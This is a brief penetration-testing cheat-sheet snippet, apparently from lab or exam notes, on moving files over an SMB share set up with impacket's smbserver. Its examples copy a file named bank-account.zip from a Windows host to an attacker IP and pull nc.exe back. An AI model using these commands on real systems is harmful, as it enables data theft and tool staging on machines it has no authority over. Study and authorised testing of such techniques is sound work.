(Linux) Setup smb share with impacket’s smbserver:
./smbserver.py test .
(Windows) Copy to smb share:
net view \\<kali-ip>
copy <file> \\<kali-ip>\\test
Ex. copy C:\bank-account.zip \\10.11.0.105\share\
Ex. copy \\10.11.0.105\share\nc.exe .
See commands.